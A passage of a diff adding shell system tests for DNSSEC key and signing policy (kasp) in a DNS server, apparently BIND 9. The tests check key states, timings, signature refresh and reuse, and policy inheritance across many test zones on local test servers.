+set_keytimes_algorithm_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Zone: dnssec-keygen.kasp.
+#
+set_zone "dnssec-keygen.kasp"
+set_policy "rsasha256" "3" "1234"
+set_server "ns3" "10.53.0.3"
+# Key properties, timings and states same as above.
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_algorithm_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Zone: some-keys.kasp.
+#
+set_zone "some-keys.kasp"
+set_policy "rsasha256" "3" "1234"
+set_server "ns3" "10.53.0.3"
+# Key properties, timings and states same as above.
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_algorithm_policy "pregenerated"
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Zone: pregenerated.kasp.
+#
+# There are more pregenerated keys than needed, hence the number of keys is
+# six, not three.
+set_zone "pregenerated.kasp"
+set_policy "rsasha256" "6" "1234"
+set_server "ns3" "10.53.0.3"
+# Key properties, timings and states same as above.
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_algorithm_policy "pregenerated"
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Zone: rumoured.kasp.
+#
+# There are three keys in rumoured state.
+set_zone "rumoured.kasp"
+set_policy "rsasha256" "3" "1234"
+set_server "ns3" "10.53.0.3"
+# Key properties, timings and states same as above.
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_algorithm_policy
+# Activation date is a day later.
+set_addkeytime "KEY1" "ACTIVE" $(key_get KEY1 ACTIVE) 86400
+set_addkeytime "KEY1" "RETIRED" $(key_get KEY1 RETIRED) 86400
+set_addkeytime "KEY1" "REMOVED" $(key_get KEY1 REMOVED) 86400
+set_addkeytime "KEY2" "ACTIVE" $(key_get KEY2 ACTIVE) 86400
+set_addkeytime "KEY2" "RETIRED" $(key_get KEY2 RETIRED) 86400
+set_addkeytime "KEY2" "REMOVED" $(key_get KEY2 REMOVED) 86400
+set_addkeytime "KEY3" "ACTIVE" $(key_get KEY3 ACTIVE) 86400
+set_addkeytime "KEY3" "RETIRED" $(key_get KEY3 RETIRED) 86400
+set_addkeytime "KEY3" "REMOVED" $(key_get KEY3 REMOVED) 86400
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Zone: secondary.kasp.
+#
+set_zone "secondary.kasp"
+set_policy "rsasha256" "3" "1234"
+set_server "ns3" "10.53.0.3"
+# Key properties, timings and states same as above.
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_algorithm_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Update zone.
+n=$((n+1))
+echo_i "check that we correctly sign the zone after IXFR for zone ${ZONE} ($n)"
+ret=0
+cp ns2/secondary.kasp.db.in2 ns2/secondary.kasp.db
+rndccmd 10.53.0.2 reload "$ZONE" > /dev/null || log_error "rndc reload zone ${ZONE} failed"
+
+_wait_for_done_subdomains() {
+ ret=0
+ dig_with_opts "a.${ZONE}" "@${SERVER}" A > "dig.out.$DIR.test$n.a" || return 1
+ grep "status: NOERROR" "dig.out.$DIR.test$n.a" > /dev/null || return 1
+ grep "a.${ZONE}\..*${DEFAULT_TTL}.*IN.*A.*10\.0\.0\.11" "dig.out.$DIR.test$n.a" > /dev/null || return 1
+ check_signatures $_qtype "dig.out.$DIR.test$n.a" "ZSK"
+ if [ $ret -gt 0 ]; then return $ret; fi
+
+ dig_with_opts "d.${ZONE}" "@${SERVER}" A > "dig.out.$DIR.test$n.d" || return 1
+ grep "status: NOERROR" "dig.out.$DIR.test$n.d" > /dev/null || return 1
+ grep "d.${ZONE}\..*${DEFAULT_TTL}.*IN.*A.*10\.0\.0\.4" "dig.out.$DIR.test$n.d" > /dev/null || return 1
+ check_signatures $_qtype "dig.out.$DIR.test$n.d" "ZSK"
+ return $ret
+}
+retry_quiet 5 _wait_for_done_subdomains || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# TODO: we might want to test:
+# - configuring a zone with too many active keys (should trigger retire).
+# - configuring a zone with keys not matching the policy.
+
+#
+# Zone: rsasha1-nsec3.kasp.
+#
+if $SHELL ../testcrypto.sh -q RSASHA1
+then
+ set_zone "rsasha1-nsec3.kasp"
+ set_policy "rsasha1-nsec3" "3" "1234"
+ set_server "ns3" "10.53.0.3"
+ # Key properties.
+ set_keyalgorithm "KEY1" "7" "NSEC3RSASHA1" "2048"
+ set_keyalgorithm "KEY2" "7" "NSEC3RSASHA1" "2048"
+ set_keyalgorithm "KEY3" "7" "NSEC3RSASHA1" "2000"
+ # Key timings and states same as above.
+
+ check_keys
+ check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+ set_keytimes_algorithm_policy
+ check_keytimes
+ check_apex
+ check_subdomain
+ dnssec_verify
+fi
+
+#
+# Zone: rsasha256.kasp.
+#
+set_zone "rsasha256.kasp"
+set_policy "rsasha256" "3" "1234"
+set_server "ns3" "10.53.0.3"
+# Key properties.
+set_keyalgorithm "KEY1" "8" "RSASHA256" "2048"
+set_keyalgorithm "KEY2" "8" "RSASHA256" "2048"
+set_keyalgorithm "KEY3" "8" "RSASHA256" "3072"
+# Key timings and states same as above.
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_algorithm_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Zone: rsasha512.kasp.
+#
+set_zone "rsasha512.kasp"
+set_policy "rsasha512" "3" "1234"
+set_server "ns3" "10.53.0.3"
+# Key properties.
+set_keyalgorithm "KEY1" "10" "RSASHA512" "2048"
+set_keyalgorithm "KEY2" "10" "RSASHA512" "2048"
+set_keyalgorithm "KEY3" "10" "RSASHA512" "3072"
+# Key timings and states same as above.
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_algorithm_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Zone: ecdsa256.kasp.
+#
+set_zone "ecdsa256.kasp"
+set_policy "ecdsa256" "3" "1234"
+set_server "ns3" "10.53.0.3"
+# Key properties.
+set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256"
+set_keyalgorithm "KEY2" "13" "ECDSAP256SHA256" "256"
+set_keyalgorithm "KEY3" "13" "ECDSAP256SHA256" "256"
+# Key timings and states same as above.
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_algorithm_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Zone: ecdsa512.kasp.
+#
+set_zone "ecdsa384.kasp"
+set_policy "ecdsa384" "3" "1234"
+set_server "ns3" "10.53.0.3"
+# Key properties.
+set_keyalgorithm "KEY1" "14" "ECDSAP384SHA384" "384"
+set_keyalgorithm "KEY2" "14" "ECDSAP384SHA384" "384"
+set_keyalgorithm "KEY3" "14" "ECDSAP384SHA384" "384"
+# Key timings and states same as above.
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_algorithm_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Zone: ed25519.kasp.
+#
+if [ -f ed25519-supported.file ]; then
+ set_zone "ed25519.kasp"
+ set_policy "ed25519" "3" "1234"
+ set_server "ns3" "10.53.0.3"
+ # Key properties.
+ set_keyalgorithm "KEY1" "15" "ED25519" "256"
+ set_keyalgorithm "KEY2" "15" "ED25519" "256"
+ set_keyalgorithm "KEY3" "15" "ED25519" "256"
+ # Key timings and states same as above.
+
+ check_keys
+ check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+ set_keytimes_algorithm_policy
+ check_keytimes
+ check_apex
+ check_subdomain
+ dnssec_verify
+fi
+
+#
+# Zone: ed448.kasp.
+#
+if [ -f ed448-supported.file ]; then
+ set_zone "ed448.kasp"
+ set_policy "ed448" "3" "1234"
+ set_server "ns3" "10.53.0.3"
+ # Key properties.
+ set_keyalgorithm "KEY1" "16" "ED448" "456"
+ set_keyalgorithm "KEY2" "16" "ED448" "456"
+ set_keyalgorithm "KEY3" "16" "ED448" "456"
+ # Key timings and states same as above.
+
+ check_keys
+ check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+ set_keytimes_algorithm_policy
+ check_keytimes
+ check_apex
+ check_subdomain
+ dnssec_verify
+fi
+
+# Set key times for 'autosign' policy.
+set_keytimes_autosign_policy() {
+ # The KSK was published six months ago (with settime).
+ created=$(key_get KEY1 CREATED)
+ set_addkeytime "KEY1" "PUBLISHED" "${created}" -15552000
+ set_addkeytime "KEY1" "ACTIVE" "${created}" -15552000
+ set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -15552000
+ # Key lifetime is 2 years, 63072000 seconds.
+ active=$(key_get KEY1 ACTIVE)
+ set_addkeytime "KEY1" "RETIRED" "${active}" 63072000
+ # The key is removed after the retire time plus DS TTL (1d),
+ # parent propagation delay (1h), retire safety (1h) =
+ # 86400 + 3600 + 3600 = 93600
+ retired=$(key_get KEY1 RETIRED)
+ set_addkeytime "KEY1" "REMOVED" "${retired}" 93600
+
+ # The ZSK was published six months ago (with settime).
+ created=$(key_get KEY2 CREATED)
+ set_addkeytime "KEY2" "PUBLISHED" "${created}" -15552000
+ set_addkeytime "KEY2" "ACTIVE" "${created}" -15552000
+ # Key lifetime for KSK2 is 1 year, 31536000 seconds.
+ active=$(key_get KEY2 ACTIVE)
+ set_addkeytime "KEY2" "RETIRED" "${active}" 31536000
+ # The key is removed after the retire time plus:
+ # TTLsig (RRSIG TTL): 1 day (86400 seconds)
+ # Dprp (propagation delay): 5 minutes (300 seconds)
+ # retire-safety: 1 hour (3600 seconds)
+ # Dsgn (sign delay): 7 days (604800 seconds)
+ # Iret: 695100 seconds.
+ retired=$(key_get KEY2 RETIRED)
+ set_addkeytime "KEY2" "REMOVED" "${retired}" 695100
+}
+
+#
+# Zone: expired-sigs.autosign.
+#
+set_zone "expired-sigs.autosign"
+set_policy "autosign" "2" "300"
+set_server "ns3" "10.53.0.3"
+# Key properties.
+key_clear "KEY1"
+set_keyrole "KEY1" "ksk"
+set_keylifetime "KEY1" "63072000"
+set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "no"
+
+key_clear "KEY2"
+set_keyrole "KEY2" "zsk"
+set_keylifetime "KEY2" "31536000"
+set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY2" "no"
+set_zonesigning "KEY2" "yes"
+
+# Both KSK and ZSK stay OMNIPRESENT.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY1" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_DS" "omnipresent"
+
+set_keystate "KEY2" "GOAL" "omnipresent"
+set_keystate "KEY2" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent"
+# Expect only two keys.
+key_clear "KEY3"
+key_clear "KEY4"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_autosign_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Verify all signatures have been refreshed.
+check_rrsig_refresh() {
+ # Apex.
+ _qtypes="DNSKEY SOA NS NSEC"
+ for _qtype in $_qtypes
+ do
+ n=$((n+1))
+ echo_i "check ${_qtype} rrsig is refreshed correctly for zone ${ZONE} ($n)"
+ ret=0
+ dig_with_opts "$ZONE" "@${SERVER}" "$_qtype" > "dig.out.$DIR.test$n" || log_error "dig ${ZONE} ${_qtype} failed"
+ grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || log_error "mismatch status in DNS response"
+ grep "${ZONE}\..*IN.*RRSIG.*${_qtype}.*${ZONE}" "dig.out.$DIR.test$n" > "rrsig.out.$ZONE.$_qtype" || log_error "missing RRSIG (${_qtype}) record in response"
+ # If this exact RRSIG is also in the zone file it is not refreshed.
+ _rrsig=$(cat "rrsig.out.$ZONE.$_qtype")
+ grep "${_rrsig}" "${DIR}/${ZONE}.db" > /dev/null && log_error "RRSIG (${_qtype}) not refreshed in zone ${ZONE}"
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+ done
+
+ # Below apex.
+ _labels="a b c ns3"
+ for _label in $_labels;
+ do
+ _qtypes="A NSEC"
+ for _qtype in $_qtypes
+ do
+ n=$((n+1))
+ echo_i "check ${_label} ${_qtype} rrsig is refreshed correctly for zone ${ZONE} ($n)"
+ ret=0
+ dig_with_opts "${_label}.${ZONE}" "@${SERVER}" "$_qtype" > "dig.out.$DIR.test$n" || log_error "dig ${_label}.${ZONE} ${_qtype} failed"
+ grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || log_error "mismatch status in DNS response"
+ grep "${ZONE}\..*IN.*RRSIG.*${_qtype}.*${ZONE}" "dig.out.$DIR.test$n" > "rrsig.out.$ZONE.$_qtype" || log_error "missing RRSIG (${_qtype}) record in response"
+ _rrsig=$(cat "rrsig.out.$ZONE.$_qtype")
+ grep "${_rrsig}" "${DIR}/${ZONE}.db" > /dev/null && log_error "RRSIG (${_qtype}) not refreshed in zone ${ZONE}"
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+ done
+ done
+}
+
+check_rrsig_refresh
+
+#
+# Zone: fresh-sigs.autosign.
+#
+set_zone "fresh-sigs.autosign"
+set_policy "autosign" "2" "300"
+set_server "ns3" "10.53.0.3"
+# Key properties, timings and states same as above.
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_autosign_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Verify signature reuse.
+check_rrsig_reuse() {
+ # Apex.
+ _qtypes="NS NSEC"
+ for _qtype in $_qtypes
+ do
+ n=$((n+1))
+ echo_i "check ${_qtype} rrsig is reused correctly for zone ${ZONE} ($n)"
+ ret=0
+ dig_with_opts "$ZONE" "@${SERVER}" "$_qtype" > "dig.out.$DIR.test$n" || log_error "dig ${ZONE} ${_qtype} failed"
+ grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || log_error "mismatch status in DNS response"
+ grep "${ZONE}\..*IN.*RRSIG.*${_qtype}.*${ZONE}" "dig.out.$DIR.test$n" > "rrsig.out.$ZONE.$_qtype" || log_error "missing RRSIG (${_qtype}) record in response"
+ # If this exact RRSIG is also in the signed zone file it is not refreshed.
+ _rrsig=$(awk '{print $5, $6, $7, $8, $9, $10, $11, $12, $13, $14;}' < "rrsig.out.$ZONE.$_qtype")
+ $CHECKZONE -f raw -F text -s full -o zone.out.${ZONE}.test$n "${ZONE}" "${DIR}/${ZONE}.db.signed" > /dev/null
+ grep "${_rrsig}" zone.out.${ZONE}.test$n > /dev/null || log_error "RRSIG (${_qtype}) not reused in zone ${ZONE}"
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+ done
+
+ # Below apex.
+ _labels="a b c ns3"
+ for _label in $_labels;
+ do
+ _qtypes="A NSEC"
+ for _qtype in $_qtypes
+ do
+ n=$((n+1))
+ echo_i "check ${_label} ${_qtype} rrsig is reused correctly for zone ${ZONE} ($n)"
+ ret=0
+ dig_with_opts "${_label}.${ZONE}" "@${SERVER}" "$_qtype" > "dig.out.$DIR.test$n" || log_error "dig ${_label}.${ZONE} ${_qtype} failed"
+ grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || log_error "mismatch status in DNS response"
+ grep "${ZONE}\..*IN.*RRSIG.*${_qtype}.*${ZONE}" "dig.out.$DIR.test$n" > "rrsig.out.$ZONE.$_qtype" || log_error "missing RRSIG (${_qtype}) record in response"
+ # If this exact RRSIG is also in the signed zone file it is not refreshed.
+ _rrsig=$(awk '{print $5, $6, $7, $8, $9, $10, $11, $12, $13, $14;}' < "rrsig.out.$ZONE.$_qtype")
+ $CHECKZONE -f raw -F text -s full -o zone.out.${ZONE}.test$n "${ZONE}" "${DIR}/${ZONE}.db.signed" > /dev/null
+ grep "${_rrsig}" zone.out.${ZONE}.test$n > /dev/null || log_error "RRSIG (${_qtype}) not reused in zone ${ZONE}"
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+ done
+ done
+}
+
+check_rrsig_reuse
+
+#
+# Zone: unfresh-sigs.autosign.
+#
+set_zone "unfresh-sigs.autosign"
+set_policy "autosign" "2" "300"
+set_server "ns3" "10.53.0.3"
+# Key properties, timings and states same as above.
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_autosign_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+check_rrsig_refresh
+
+#
+# Zone: ksk-missing.autosign.
+#
+set_zone "ksk-missing.autosign"
+set_policy "autosign" "2" "300"
+set_server "ns3" "10.53.0.3"
+# Key properties, timings and states same as above.
+# Skip checking the private file, because it is missing.
+key_set "KEY1" "PRIVATE" "no"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+dnssec_verify
+
+# Restore the PRIVATE variable.
+key_set "KEY1" "PRIVATE" "yes"
+
+#
+# Zone: zsk-missing.autosign.
+#
+set_zone "zsk-missing.autosign"
+set_policy "autosign" "2" "300"
+set_server "ns3" "10.53.0.3"
+# Key properties, timings and states same as above.
+# Skip checking the private file, because it is missing.
+key_set "KEY2" "PRIVATE" "no"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+# For the apex, we expect the SOA to be signed with the KSK because the ZSK is
+# offline. Temporary treat KEY1 as a zone signing key too.
+set_keyrole "KEY1" "csk"
+set_zonesigning "KEY1" "yes"
+set_zonesigning "KEY2" "no"
+check_apex
+set_keyrole "KEY1" "ksk"
+set_zonesigning "KEY1" "no"
+set_zonesigning "KEY2" "yes"
+check_subdomain
+dnssec_verify
+
+# Restore the PRIVATE variable.
+key_set "KEY2" "PRIVATE" "yes"
+
+#
+# Zone: zsk-retired.autosign.
+#
+set_zone "zsk-retired.autosign"
+set_policy "autosign" "3" "300"
+set_server "ns3" "10.53.0.3"
+# The third key is not yet expected to be signing.
+set_keyrole "KEY3" "zsk"
+set_keylifetime "KEY3" "31536000"
+set_keyalgorithm "KEY3" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY3" "no"
+set_zonesigning "KEY3" "no"
+# The ZSK goal is set to HIDDEN but records stay OMNIPRESENT until the new ZSK
+# is active.
+set_keystate "KEY2" "GOAL" "hidden"
+set_keystate "KEY2" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent"
+# A new ZSK should be introduced, so expect a key with goal OMNIPRESENT,
+# the DNSKEY introduced (RUMOURED) and the signatures HIDDEN.
+set_keystate "KEY3" "GOAL" "omnipresent"
+set_keystate "KEY3" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY3" "STATE_ZRRSIG" "hidden"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_autosign_policy
+
+# The old ZSK is retired.
+created=$(key_get KEY2 CREATED)
+set_keytime "KEY2" "RETIRED" "${created}"
+set_addkeytime "KEY2" "REMOVED" "${created}" 695100
+# The new ZSK is immediately published.
+created=$(key_get KEY3 CREATED)
+set_keytime "KEY3" "PUBLISHED" "${created}"
+# And becomes active after Ipub:
+# DNSKEY TTL: 300 seconds
+# zone-propagation-delay 5 minutes (300 seconds)
+# publish-safety: 1 hour (3600 seconds)
+# Ipub: 4200 seconds
+published=$(key_get KEY3 PUBLISHED)
+set_addkeytime "KEY3" "ACTIVE" "${published}" 4200
+# Lzsk: 1 year (31536000 seconds)
+active=$(key_get KEY3 ACTIVE)
+set_addkeytime "KEY3" "RETIRED" "${active}" 31536000
+# Iret: 695100 seconds.
+retired=$(key_get KEY3 RETIRED)
+set_addkeytime "KEY3" "REMOVED" "${retired}" 695100
+
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+check_rrsig_refresh
+
+#
+# Zone: legacy-keys.kasp.
+#
+set_zone "legacy-keys.kasp"
+# This zone has two active keys and two old keys left in key directory, so
+# expect 4 key files.
+set_policy "migrate-to-dnssec-policy" "4" "1234"
+set_server "ns3" "10.53.0.3"
+
+# Key properties.
+key_clear "KEY1"
+set_keyrole "KEY1" "ksk"
+set_keylifetime "KEY1" "16070400"
+set_keyalgorithm "KEY1" "8" "RSASHA256" "2048"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "no"
+
+key_clear "KEY2"
+set_keyrole "KEY2" "zsk"
+set_keylifetime "KEY2" "16070400"
+set_keyalgorithm "KEY2" "8" "RSASHA256" "2048"
+set_keysigning "KEY2" "no"
+set_zonesigning "KEY2" "yes"
+# KSK: DNSKEY, RRSIG (ksk) published. DS needs to wait.
+# ZSK: DNSKEY, RRSIG (zsk) published.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY1" "STATE_KRRSIG" "rumoured"
+set_keystate "KEY1" "STATE_DS" "hidden"
+
+set_keystate "KEY2" "GOAL" "omnipresent"
+set_keystate "KEY2" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY2" "STATE_ZRRSIG" "rumoured"
+# Two keys only.
+key_clear "KEY3"
+key_clear "KEY4"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Make sure the correct legacy keys were used (and not the removed predecessor
+# keys).
+n=$((n+1))
+echo_i "check correct keys were used when migrating zone ${ZONE} to dnssec-policy ($n)"
+ret=0
+kskfile=$(cat ns3/legacy-keys.kasp.ksk)
+basefile=$(key_get KEY1 BASEFILE)
+echo_i "filename: $basefile (expect $kskfile)"
+test "$DIR/$kskfile" = "$basefile" || ret=1
+zskfile=$(cat ns3/legacy-keys.kasp.zsk)
+basefile=$(key_get KEY2 BASEFILE)
+echo_i "filename: $basefile (expect $zskfile)"
+test "$DIR/$zskfile" = "$basefile" || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# KSK times.
+created=$(key_get KEY1 CREATED)
+keyfile=$(key_get KEY1 BASEFILE)
+grep "; Publish:" "${keyfile}.key" > published.test${n}.key1
+published=$(awk '{print $3}' < published.test${n}.key1)
+set_keytime "KEY1" "PUBLISHED" "${published}"
+set_keytime "KEY1" "ACTIVE" "${published}"
+published=$(key_get KEY1 PUBLISHED)
+# The DS can be published if the DNSKEY and RRSIG records are OMNIPRESENT.
+# This happens after max-zone-ttl (1d) plus publish-safety (1h) plus
+# zone-propagation-delay (300s) = 86400 + 3600 + 300 = 90300.
+set_addkeytime "KEY1" "SYNCPUBLISH" "${published}" 90300
+# Key lifetime is 6 months, 315360000 seconds.
+set_addkeytime "KEY1" "RETIRED" "${published}" 16070400
+# The key is removed after the retire time plus DS TTL (1d), parent
+# propagation delay (1h), and retire safety (1h) = 86400 + 3600 + 3600 = 93600.
+retired=$(key_get KEY1 RETIRED)
+set_addkeytime "KEY1" "REMOVED" "${retired}" 93600
+
+# ZSK times.
+created=$(key_get KEY2 CREATED)
+keyfile=$(key_get KEY2 BASEFILE)
+grep "; Publish:" "${keyfile}.key" > published.test${n}.key2
+published=$(awk '{print $3}' < published.test${n}.key2)
+set_keytime "KEY2" "PUBLISHED" "${published}"
+set_keytime "KEY2" "ACTIVE" "${published}"
+published=$(key_get KEY2 PUBLISHED)
+# Key lifetime is 6 months, 315360000 seconds.
+set_addkeytime "KEY2" "RETIRED" "${published}" 16070400
+# The key is removed after the retire time plus max zone ttl (1d), zone
+# propagation delay (300s), retire safety (1h), and sign delay (signature
+# validity minus refresh, 9d) = 86400 + 300 + 3600 + 777600 = 867900.
+retired=$(key_get KEY2 RETIRED)
+set_addkeytime "KEY2" "REMOVED" "${retired}" 867900
+
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Test dnssec-policy inheritance.
+#
+
+# These zones should be unsigned:
+# ns2/unsigned.tld
+# ns4/none.inherit.signed
+# ns4/none.override.signed
+# ns4/inherit.none.signed
+# ns4/none.none.signed
+# ns5/inherit.inherit.unsigned
+# ns5/none.inherit.unsigned
+# ns5/none.override.unsigned
+# ns5/inherit.none.unsigned
+# ns5/none.none.unsigned
+key_clear "KEY1"
+key_clear "KEY2"
+key_clear "KEY3"
+key_clear "KEY4"
+
+set_zone "unsigned.tld"
+set_policy "none" "0" "0"
+set_server "ns2" "10.53.0.2"
+TSIG=""
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+
+set_zone "none.inherit.signed"
+set_policy "none" "0" "0"
+set_server "ns4" "10.53.0.4"
+TSIG="hmac-sha1:sha1:$SHA1"
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+
+set_zone "none.override.signed"
+set_policy "none" "0" "0"
+set_server "ns4" "10.53.0.4"
+TSIG="hmac-sha224:sha224:$SHA224"
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+
+set_zone "inherit.none.signed"
+set_policy "none" "0" "0"
+set_server "ns4" "10.53.0.4"
+TSIG="hmac-sha256:sha256:$SHA256"
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+
+set_zone "none.none.signed"
+set_policy "none" "0" "0"
+set_server "ns4" "10.53.0.4"
+TSIG="hmac-sha256:sha256:$SHA256"
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+
+set_zone "inherit.inherit.unsigned"
+set_policy "none" "0" "0"
+set_server "ns5" "10.53.0.5"
+TSIG="hmac-sha1:sha1:$SHA1"
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+
+set_zone "none.inherit.unsigned"
+set_policy "none" "0" "0"
+set_server "ns5" "10.53.0.5"
+TSIG="hmac-sha1:sha1:$SHA1"
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+
+set_zone "none.override.unsigned"
+set_policy "none" "0" "0"
+set_server "ns5" "10.53.0.5"
+TSIG="hmac-sha224:sha224:$SHA224"
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+
+set_zone "inherit.none.unsigned"
+set_policy "none" "0" "0"
+set_server "ns5" "10.53.0.5"
+TSIG="hmac-sha256:sha256:$SHA256"
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+
+set_zone "none.none.unsigned"
+set_policy "none" "0" "0"
+set_server "ns5" "10.53.0.5"
+TSIG="hmac-sha256:sha256:$SHA256"
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+
+# These zones should be signed with the default policy:
+# ns2/signed.tld
+# ns4/override.inherit.signed
+# ns4/inherit.override.signed
+# ns5/override.inherit.signed
+# ns5/inherit.override.signed
+set_keyrole "KEY1" "csk"
+set_keylifetime "KEY1" "0"
+set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "yes"
+
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY1" "STATE_KRRSIG" "rumoured"
+set_keystate "KEY1" "STATE_ZRRSIG" "rumoured"
+set_keystate "KEY1" "STATE_DS" "hidden"
+
+set_zone "signed.tld"
+set_policy "default" "1" "3600"
+set_server "ns2" "10.53.0.2"
+TSIG=""
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_csk_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+set_zone "override.inherit.signed"
+set_policy "default" "1" "3600"
+set_server "ns4" "10.53.0.4"
+TSIG="hmac-sha1:sha1:$SHA1"
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_csk_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+set_zone "inherit.override.signed"
+set_policy "default" "1" "3600"
+set_server "ns4" "10.53.0.4"
+TSIG="hmac-sha224:sha224:$SHA224"
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_csk_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+set_zone "override.inherit.unsigned"
+set_policy "default" "1" "3600"
+set_server "ns5" "10.53.0.5"
+TSIG="hmac-sha1:sha1:$SHA1"
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_csk_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+set_zone "inherit.override.unsigned"
+set_policy "default" "1" "3600"
+set_server "ns5" "10.53.0.5"
+TSIG="hmac-sha224:sha224:$SHA224"
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_csk_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# These zones should be signed with the test policy:
+# ns4/inherit.inherit.signed
+# ns4/override.override.signed
